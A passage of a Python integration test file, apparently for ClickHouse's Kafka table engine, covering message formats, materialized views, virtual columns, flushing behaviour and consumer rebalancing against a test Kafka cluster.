# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
SELECT * FROM test.kafka;
''')
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social('string_field_on_first_position_in_protobuf', 21, 29)
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters('pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() > 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(
instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print(("Waiting for test.kafka_consumer{} to start consume".format(consumer_index)))
time.sleep(1)
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
print(("Dropping test.kafka_consumer{}".format(consumer_index)))
